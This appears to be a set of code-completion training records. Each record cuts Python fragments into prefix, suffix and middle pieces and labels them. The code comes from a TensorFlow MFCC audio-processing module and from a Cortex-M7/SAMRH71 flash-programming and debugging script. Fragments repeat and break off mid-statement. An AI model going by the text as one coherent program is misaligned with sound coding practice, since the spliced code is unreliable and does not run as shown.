# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot(
tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
)
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0 | get_label | identifier_name |
|
audio_processing.py |
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot(
tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
)
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds | label_ds = prepare_label_dataset(file_paths)
if len(label_list) > 0:
label_ds = label_ds.map(
lambda label: tf.argmax(label == label_list),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return tf.data.Dataset.zip((dataset, label_ds)) | identifier_body |
|
dap_cortex-m7.py | _sgpb | (bit_index << 8))
waitForFlashReady()
else:
log.info("Debug:: Clearing GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_cgpb | (bit_index << 8))
waitForFlashReady()
mask = mask >> 1
if not mask:
return
bit_index += 1
return # This should never be reached...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 don't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def prog_read(type_of_mem, address, length, data):#mplab
log.info("Prog: Reading %d bytes from address 0x%0x of %s memory..." % (length, address, type_of_mem))
global need_reset_for_read_operations
if need_reset_for_read_operations:
reset_and_halt() # necessary for reading flash with specific projects, ref MPLABX-4516
need_reset_for_read_operations = False
global did_read_operation
did_read_operation = True
if str(type_of_mem) == "Cfg":
gpnvm_address = address & 0x1F
dev.Write32(efc_fcr, efc_cmd_ggpb)
read_index = 0
data_index = 0
read_data = 0
while read_index < (gpnvm_address + length):
if read_index % 4 == 0:
read_data = dev.Read32(efc_frr)
log.info("Debug:: GPNVM at address 0x%0X, value: 0x%0X" %
(address, read_data))
if read_index >= gpnvm_address:
data[data_index] = 0xFF & read_data
data_index += 1
read_data = read_data >> 8
read_index += 1
return
dev.Read(address, data, 0, length)
def verify_transfer(type_of_mem, address, data, length):#mplab
log.info("Prog: not implemented: Verifying %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
def end_of_operations():#mplab
log.info("Prog: End of operations")
if was_running and did_read_operation:
if flash_strategy == 0:
run_target()
if flash_strategy == 1:
log.info("Target was running and we did prog_read, release it now")
release_from_reset()
dev.Disconnect()
global g_is_running
g_is_running = True
def begin_debug_session():#mplab
log.info("Debug:: Begin debug session")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
def debug_read(mem_type, start, length, data):#mplab
log.info("Debug: Reading %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Read(start, data, 0, length)
def debug_write(mem_type, start, length, data):#mplab
log.info("Debug: Writing %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Write(start, data, 0, length)
def get_pc():#mplab
return dev.ReadReg64(arm.PC)
def get_sp():
return dev.ReadReg64(arm.SP)
def run_target():#mplab
log.info("Debug: Run target")
dev.Write32(arm.DHCSR, 0xa05f0001) # DBGKEY|C_DEBUGEN
def halt_target():#mplab
log.info("Debug: Halt target")
#print_DHCSR("Target to be halted ")
dev.Write32(arm.DHCSR, 0xa05f0003) # DBGKEY|C_HALT|C_DEBUGEN
def step_target():#mplab
log.info("Debug: Stepping at pc 0x%0x" % get_pc())
#get_pc()
dev.Write32(arm.DHCSR, 0xa05f000b) #DBGKEY | C_DEBUGEN | C_HALT | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f000d) #DBGKEY | C_DEBUGEN | C_STEP | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f0003) #DBGKEY | C_DEBUGEN | C_HALT
def set_pc(pc):#mplab
log.info("Debug: Set pc to 0x%0x" % pc)
dev.WriteReg64(arm.PC,pc)
def set_sp(sp):
log.info("Debug: Set sp to 0x%0x" % sp)
dev.WriteReg64(arm.SP, sp)
def set_sw_bp(address, instruction, flags):
"""
* Sets/clears a software breakpoint
* @param address -> the address of the software breakpoint
* @param instruction -> the instruction to be programmed (either the software breakpoint
* opcode or the original instruction the software breakpoint was replacing).
* @param flags -> One or more of the SWBPFlags listed below
* @return returns the original/old opcode at address
"""
log.info("Debug:: set/remove bp at address 0x%0x, instructions 0x%0x, flags = 0x%0x" % (
address, instruction, flags))
# Accept addressing both from FLASH_START and from 0x0
addr = address & (FLASH_START-1)
single_page_access = False
buffer_size = PAGE_SIZE * 16
# Canopus: single page read-modify-write is possible within the first 16kb of flash.
# SAMRH71: single page read-modify-write is possible in whole flash.
if addr < 16384 or "RH71" in device:
buffer_size = PAGE_SIZE
single_page_access = True
buffer_mask = long(buffer_size-1)
data_buffer = bytearray(buffer_size)
# Get the start address to the flash page(es) we need to erase
start_addr = addr & ~(buffer_mask)
absolute_start_addr = address & ~(buffer_mask)
# Get BP address within the buffer
bp_addr = addr & buffer_mask
prog_read("pgm", absolute_start_addr, buffer_size, data_buffer)
org_inst = 0
n = 0
# Replace instruction in data_buffer
while(n < 2):
org_inst += data_buffer[bp_addr+n] << (n*8)
data_buffer[bp_addr+n] = ((instruction >> (n*8)) & 0xff)
n = n+1
if single_page_access:
if "RH71" in device:
# Remove flash offset, if any, and mask away page internal address bits.
# FARG bitfield in EFC_FCR
page_number = addr & 0x3fff00 # SAMRH71 has page_size 256
# Erase and write page (two separate commands on SAMRH71)
dev.Write32(efc_fcr, efc_cmd_ep | page_number)
waitForFlashReady()
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
else:
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Then shift right once to position page_number in the FARG bitfield in EFC_FCR
page_number = (addr & 0x3ffe00)/2 # Canopus has page_size 512
# Erase and write page (one single command on Canopus)
dev.Write32(efc_fcr, efc_cmd_ewp | page_number)
waitForFlashReady()
else:
# Erase 16 pages (16pages == buffer_size). The "0x200" sets the number of pages to erase.
dev.Write32(efc_fcr, efc_cmd_epa | (start_addr >> 1) | 0x200)
waitForFlashReady()
prog_write("Pgm", absolute_start_addr, buffer_size, data_buffer)
return org_inst
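# Illustrative use of set_sw_bp (hypothetical address and flags): planting a breakpoint
# writes the Thumb BKPT opcode and keeps the returned original instruction for removal:
#   original = set_sw_bp(0x00400120, 0xBE00, 0)   # set: 0xBE00 == BKPT #0
#   set_sw_bp(0x00400120, original, 0)            # clear: restore the saved opcode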
def reset_target():#mplab
| reset_and_halt() | identifier_body |
|
dap_cortex-m7.py | 5fa0001) # VECTKEY | VECTRESET) # 1=VECTRESET 4=SYSRESETREQ
n = 0
max_retries = 100
seenReset = False
while n < max_retries:
dhcsr = dev.Read32(arm.DHCSR)
log.info("S_RESET_ST = %s / %s at PC = %X" % ("1" if dhcsr & 0x02000000 else "0", "Halted" if dhcsr & 0x20000 else "RUNNING", get_pc()))
if (dhcsr & 0x02000000): # wait for S_RESET_ST
seenReset = True
hasHalted = 0 != (dhcsr & 0x20000) # S_HALT
if seenReset:
if hasHalted: # wait for S_HALT
break
dev.Delay(100000) # 100ms
n = n+1
dev.Write32(dev.DEMCR, 0x01000000) # TRCENA reset VC_CORERESET bit
if n == max_retries:
raise Exception("timeout in reset")
if "RH71" in device:
initialize_HEFC()
def initialize_HEFC(): # only for SAMRH71
log.info("Prog: initialize_HEFC")
# set up GCLK for HEFC
dev.Write32(0x40100254, 0x00008000) # disable watchdog wdt_mr
dev.Write32(0x4000C020, 0x00370028) # Set internal RC 10 MHz ckgr_mor
dev.Write32(0x4000C10C, 0x30401432) # Set GCLK with div 5 pmc_pcr
if rh71_2_0_workaround_VAR_factor:
set_var_factor_and_power_toggle_flash()
#waitForPWSReady
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fpmr)
if r & 2: # PWS_STAT
dev.Delay(250000) # wait 250ms after seeing PWS_STAT bit
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for PWS ready")
if rh71_2_0_workaround_init_PC_SP:
initialize_PC_SP()
def set_var_factor_and_power_toggle_flash(): # only for SAMRH71, probably only needed for rev 2.0 boards
# reset problem for flash (for rev 2.0 of device), can read flash only every second reset
# without this workaround
dev.Write32(efc_fpmr, 0x00013F0F) # set var factor at 0x3F 1111
dev.Write32(efc_fpmr, 0x00013F0E) # Power OFF flash 1110
dev.Write32(efc_fpmr, 0x00003F0D) # Power ON flash 1101
def initialize_PC_SP(): # only for SAMRH71, probably only needed for rev 2.0 boards
log.info("Initialize PC and SP (should be done by core, problem in SAMRH71F20-EK board rev 2.0)")
reset_handler = dev.Read32(0x10000004)
old_pc = get_pc()
pc_different = old_pc != (reset_handler & 0xFFFFFFFE)
stack_pointer = dev.Read32(0x10000000)
old_sp = get_sp()
sp_different = old_sp != stack_pointer
if pc_different and reset_handler != 0xFFFFFFFF: # only if not flash is erased
set_pc(reset_handler)
# Correct EPSR T bit in case core didn't initialize PC and T bit correctly (if PC bit 0 is set, then set T bit)
psr = dev.ReadReg64(16)
if reset_handler & 1 and not psr & 0x01000000:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X and set EPSR T bit" % (old_pc, get_pc()))
dev.WriteReg64(16, psr | 0x01000000)
else:
log.error("PC initialization by core failed, corrected 0x%X -> 0x%X" % (old_pc, get_pc()))
if sp_different and stack_pointer != 0xFFFFFFFF: # only if not flash is erased
set_sp(stack_pointer)
log.error("SP initialization by core failed, corrected 0x%X -> 0x%X" % (old_sp, get_sp()))
def hold_in_reset():#mplab
log.info("Prog: Hold in reset")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
dev.Disconnect()
def release_from_reset():#mplab
log.info("Prog: Release from reset")
# toggle reset line
dev.Pins(0,dev.RESET,1000)
if "RH71" in device and rh71_2_0_workaround_reset_30ms_delay:
dev.Delay(30000) # add 30ms delay holding reset low, needed for SAMRH71 board rev 2.0
dev.Pins(dev.RESET,dev.RESET,1000) # now float reset back
# workaround if reset line is not connected on board
# dev.Write32(dev.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ
def write_flash_page(adr, ofs, data):
log.info("Write flash page adr=0x%0x, ofs=0x%0x" % (adr, ofs))
dev.Write(adr, data, ofs, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Position page_number in the FARG bitfield in EFC_FCR
if "RH71" in device:
page_number = adr & 0x3fff00 # SAMRH71 has page_size 256
else:
page_number = (adr & 0x3ffe00)/2 # Canopus has page_size 512
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
log.info("Written page %d (0x%0x) at 0x%0x" %
(page_number/256, page_number*2, adr))
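# Illustrative check of the page arithmetic above (hypothetical Canopus address):
# an offset of 0x1200 into flash lies in 512-byte page 9 (0x1200 // 512), and
# (0x1200 & 0x3ffe00) / 2 == 0x900 == 9 << 8, i.e. the page number already shifted
# into the FARG bitfield of EFC_FCR as described in the comments above.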
def prog_write(type_of_mem, address, length, data):#mplab
log.info("Prog: Writing %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
if str(type_of_mem) == "Cfg":
# Converting value to indexing access, and writing one GPNVM bit at the time
mask = GPNVM_BIT_MASK # Use mask to avoid writing to reserved bits
bit_index = 0
for val in data:
for bit in bitsInByte(val):
if(mask & 0x01):
if(bit == 1):
log.info("Debug:: Setting GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_sgpb | (bit_index << 8))
waitForFlashReady()
else:
log.info("Debug:: Clearing GPNVM bit %d" % bit_index)
dev.Write32(efc_fcr,
efc_cmd_cgpb | (bit_index << 8))
waitForFlashReady()
mask = mask >> 1
if not mask:
return
bit_index += 1
return # This should never be reached...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 don't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def | prog_read | identifier_name |
|
dap_cortex-m7.py |
global need_reset_for_read_operations
need_reset_for_read_operations = True if flash_strategy == 1 else False
def bitsInByte(byteValue):
for i in xrange(8):
yield (byteValue >> i) & 1
def log_efc_fsr_error(fsr):
err_string = ""
if fsr & 0x00080000: # FSR_MECCEMSB
err_string = "MECCEMSB"
if fsr & 0x00040000: # FSR_UECCEMSB
err_string += " UECCEMSB"
if fsr & 0x00020000: # FSR_MECCELSB
err_string += " MECCELSB"
if fsr & 0x00010000: # FSR_UECCELSB
err_string += " UECCELSB"
if fsr & 0x10: # FSR_WREER
err_string += " WREER"
if fsr & 8: # FSR_FLERR
err_string += " FLERR"
if fsr & 4: # FSR_FLOCKE
err_string += " FLOCKE"
if fsr & 2: # FSR_FCMDE
err_string += " FCMDE"
if err_string == "":
return
err_string = err_string + (" from the flash controller after command 0x%0x" % (dev.Read32(efc_fcr)))
log.error(err_string)
def waitForFlashReady():
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fsr)
log_efc_fsr_error(r)
if r & 1: # FSR_FRDY:
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for flash ready")
def halt_or_raise():
halt_target()
n = 0
while n < 100:
if not is_target_running():
return
dev.Delay(100000) # 100ms
n = n+1
raise Exception("Failed to halt target!")
def resetPeripheralsWithRstc():
dev.Write32(rstc_mr, 0xa5000b00) # long(RSTC_KEY) | rstc_erstl)
dev.Write32(rstc_cr, 0xa5000001) # long(RSTC_KEY) | PROCRST)
n = 0
max_retries = 100
while n < max_retries:
dev.Delay(10000) # 10ms
r = dev.Read32(rstc_sr)
if r & 0x00020000: # SRCMP
continue # Software reset in progress
if r & 0x00010000: # NRSTL
break
n = n+1
if n == max_retries:
raise Exception("timeout in reset")
dev.Write32(rstc_mr, 0xa5000001) # long(RSTC_KEY) | URSTEN) # Enable user reset again (URSTEN == 1)
def blank_check(): #mplab
log.info("Prog: Blank check")
def erase():#mplab
log.info("Prog: Erase")
reset_and_halt()
dev.Write32(efc_fcr, efc_cmd_ea)
#log.info("Issued Erase All, wait for flash ready")
waitForFlashReady()
def reset_and_halt():
log.info("Prog: Reset and halt")
# check run state and clear S_RESET_ST so that we can use it to detect end of reset later
if is_target_running():
halt_or_raise()
dev.Write32(arm.DEMCR, 0x01000001) # TRCENA | VC_CORERESET)
if "RH71" in device:
# SAMRH71 use SYSRESETREQ to reset core + peripherals, will loose connection so need to reconnect.
try:
dev.Write32(arm.AIRCR, 0x05fa0004) # VECTKEY | SYSRESETREQ) # 1=VECTRESET 4=SYSRESETREQ
except:
log.info("Reset with SYSRESETREQ, lost connection, try to reconnect to the device")
dev.Disconnect()
dev.Connect(comm_iface, comm_speed)
else:
# Canopus use RSTC (PROCRST) to reset peripherals and VECTRESET to reset core.
resetPeripheralsWithRstc()
dev.Write32(arm.AIRCR, 0x05fa0001) # VECTKEY | VECTRESET) # 1=VECTRESET 4=SYSRESETREQ
n = 0
max_retries = 100
seenReset = False
while n < max_retries:
dhcsr = dev.Read32(arm.DHCSR)
log.info("S_RESET_ST = %s / %s at PC = %X" % ("1" if dhcsr & 0x02000000 else "0", "Halted" if dhcsr & 0x20000 else "RUNNING", get_pc()))
if (dhcsr & 0x02000000): # wait for S_RESET_ST
seenReset = True
hasHalted = 0 != (dhcsr & 0x20000) # S_HALT
if seenReset:
if hasHalted: # wait for S_HALT
break
dev.Delay(100000) # 100ms
n = n+1
dev.Write32(dev.DEMCR, 0x01000000) # TRCENA reset VC_CORERESET bit
if n == max_retries:
raise Exception("timeout in reset")
if "RH71" in device:
initialize_HEFC()
def initialize_HEFC(): # only for SAMRH71
log.info("Prog: initialize_HEFC")
# set up GCLK for HEFC
dev.Write32(0x40100254, 0x00008000) # disable watchdog wdt_mr
dev.Write32(0x4000C020, 0x00370028) # Set internal RC 10 MHz ckgr_mor
dev.Write32(0x4000C10C, 0x30401432) # Set GCLK with div 5 pmc_pcr
if rh71_2_0_workaround_VAR_factor:
set_var_factor_and_power_toggle_flash()
#waitForPWSReady
n = 0
max_retries = 100
while n < max_retries:
r = dev.Read32(efc_fpmr)
if r & 2: # PWS_STAT
dev.Delay(250000) # wait 250ms after seeing PWS_STAT bit
break
dev.Delay(100000) # 100ms
n = n+1
if n == max_retries:
raise Exception("Timeout waiting for PWS ready")
if rh71_2_0_workaround_init_PC_SP:
initialize_PC_SP()
def set_var_factor_and_power_toggle_flash(): # only for SAMRH71, probably only needed for rev 2.0 boards
# reset problem for flash (for rev 2.0 of device), can read flash only every second reset
# without this workaround
dev.Write32(efc_fpmr, 0x00013F0F) # set var factor at 0x3F 1111
dev.Write32(efc_fpmr, 0x00013F0E) # Power OFF flash 1110
dev.Write32(efc_fpmr, 0x00003F0D) # Power ON flash 1101
def initialize_PC_SP(): # only for SAMRH71, probably only needed for rev 2.0 boards
log.info("Initialize PC and SP (should be done by core, problem in SAMRH71F20-EK board rev 2.0)")
reset_handler = dev.Read32(0x10000004)
old_pc = get_pc()
pc_different = old_pc != (reset_handler & 0xFFFFFFFE)
stack_pointer = dev | was_running = True
halt_or_raise() | conditional_block |
|
dap_cortex-m7.py | ...
elif str(type_of_mem) != "Pgm":
log.warning(
"Debug:: Currently not supporting writing to memory type %s" % type_of_mem)
return
if is_target_running():
log.error("Error: Target is running when it should be halted")
halt_or_raise()
if "RH71" not in device: # SAMRH71 don't support wait states (ref prelim data sheet)
# Set Flash Wait States to 7 cycles (6+1)
dev.Write32(efc_fmr, 0x00000600)
written = 0
while written < length:
write_flash_page(address, written, data)
written += PAGE_SIZE
address += PAGE_SIZE
def prog_read(type_of_mem, address, length, data):#mplab
log.info("Prog: Reading %d bytes from address 0x%0x of %s memory..." % (length, address, type_of_mem))
global need_reset_for_read_operations
if need_reset_for_read_operations:
reset_and_halt() # necessary for reading flash with specific projects, ref MPLABX-4516
need_reset_for_read_operations = False
global did_read_operation
did_read_operation = True
if str(type_of_mem) == "Cfg":
gpnvm_address = address & 0x1F
dev.Write32(efc_fcr, efc_cmd_ggpb)
read_index = 0
data_index = 0
read_data = 0
while read_index < (gpnvm_address + length):
if read_index % 4 == 0:
read_data = dev.Read32(efc_frr)
log.info("Debug:: GPNVM at address 0x%0X, value: 0x%0X" %
(address, read_data))
if read_index >= gpnvm_address:
data[data_index] = 0xFF & read_data
data_index += 1
read_data = read_data >> 8
read_index += 1
return
dev.Read(address, data, 0, length)
def verify_transfer(type_of_mem, address, data, length):#mplab
log.info("Prog: not implemented: Verifying %d bytes to address 0x%0x of %s memory" % (length, address, type_of_mem))
def end_of_operations():#mplab
log.info("Prog: End of operations")
if was_running and did_read_operation:
if flash_strategy == 0:
run_target()
if flash_strategy == 1:
log.info("Target was running and we did prog_read, release it now")
release_from_reset()
dev.Disconnect()
global g_is_running
g_is_running = True
def begin_debug_session():#mplab
log.info("Debug:: Begin debug session")
dev.Connect(comm_iface, comm_speed)
reset_and_halt()
def debug_read(mem_type, start, length, data):#mplab
log.info("Debug: Reading %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Read(start, data, 0, length)
